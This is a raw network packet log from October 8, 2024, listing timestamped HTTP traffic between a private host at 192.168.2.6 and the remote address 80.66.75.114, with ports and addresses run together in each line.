                                                Oct 8, 2024 04:24:39.324167967 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324177980 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324187040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324197054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324218035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324218035 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324239016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324246883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324258089 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324266911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324285030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324287891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324297905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324300051 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324307919 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324316978 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324317932 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324337959 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324357986 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324385881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324393988 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324433088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324450016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324471951 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324526072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324536085 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324544907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324554920 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324564934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324594975 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324599981 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324605942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324615002 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324620962 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324624062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324635029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324644089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324665070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324683905 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324794054 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324845076 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324872971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324908018 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324911118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324947119 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.324974060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.324984074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325007915 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325020075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325093031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325103998 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325110912 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325150967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325150967 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325154066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325165033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325174093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325197935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325210094 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325351000 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325361013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325372934 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325381041 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325388908 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325392008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325407982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325411081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325411081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325418949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325427055 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325428963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325439930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325448990 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325450897 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325459003 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325469017 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325474024 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325479031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325493097 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325500011 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325504065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325505972 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325520039 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325530052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325531960 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325541019 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325541973 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325551033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325561047 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325565100 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325571060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325606108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325606108 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325622082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325632095 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325639963 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325670958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325670958 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325680971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325690031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325697899 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325706959 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325717926 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325741053 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325826883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325835943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325845957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325854063 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325859070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325866938 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325877905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.325884104 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325901985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.325926065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.413938046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.413955927 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.413965940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414030075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414074898 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414261103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414272070 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414280891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414313078 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414333105 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414405107 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414414883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414423943 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414433956 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414453030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414453030 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414477110 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414484978 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414485931 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414495945 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414505005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414520025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414530993 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414549112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414550066 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414561033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414570093 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414583921 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414592028 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414601088 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414611101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414619923 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414628983 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414638042 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414654970 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414664030 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414673090 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414681911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414690971 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414700031 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414709091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414717913 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414726973 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414736032 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414746046 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414747000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414756060 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414769888 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414777994 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414778948 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414788961 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414792061 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414803982 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414805889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414813995 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414824009 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414829969 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414834023 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414846897 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414848089 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414855957 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414864063 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414866924 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414885998 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414911032 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.414921999 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414932013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414941072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.414951086 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604827881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604845047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604851961 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604868889 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604891062 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604898930 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604917049 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604938984 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604942083 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604957104 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604958057 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604969025 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.604983091 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.604995966 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605009079 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605011940 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605036020 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605052948 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605057001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605081081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605083942 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605103016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605107069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605124950 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605132103 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605146885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605159044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605170965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605178118 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605201006 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605201006 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605220079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605223894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605242014 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605245113 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605264902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605271101 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605285883 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605287075 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605314016 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605318069 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605330944 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605354071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605359077 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605384111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605393887 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605402946 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605424881 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605426073 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605433941 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605456114 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605468988 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605475903 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605494022 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605499029 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605511904 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605514050 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605547905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605561972 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605571985 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605586052 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605592012 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605608940 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605626106 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605654955 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605654955 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605663061 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605678082 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605693102 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605699062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605720997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605727911 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605736971 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605751038 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605770111 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605770111 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605792999 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605803013 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605806112 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605820894 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605844021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605864048 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605870008 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605895042 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605895996 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605915070 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605918884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605933905 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605935097 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605973005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.605974913 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.605987072 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606009007 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606010914 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606036901 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606039047 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606059074 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606061935 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606071949 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606093884 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606106997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606117964 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606142044 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606158018 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606173038 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606195927 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606215000 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606216908 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606235027 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606252909 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606256962 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606273890 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606296062 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606317997 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606337070 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606340885 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606355906 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606378078 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606391907 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606399059 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606420040 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606420040 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606441021 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606463909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606463909 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606470108 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606473923 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606499910 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606513023 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606520891 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606539965 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606548071 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606563091 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606570005 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606589079 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606590033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606607914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606618881 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606633902 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606637001 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606661081 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606662035 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606678963 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606683016 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606698990 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606714010 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606722116 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606734991 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606754065 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606754065 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606772900 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606776953 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606792927 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606801033 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606818914 CEST4973880192.168.2.680.66.75.114
                                                Oct 8, 2024 04:24:39.606822968 CEST804973880.66.75.114192.168.2.6
                                                Oct 8, 2024 04:24:39.606839895 CEST4973880192.168.2.680.66.75.114
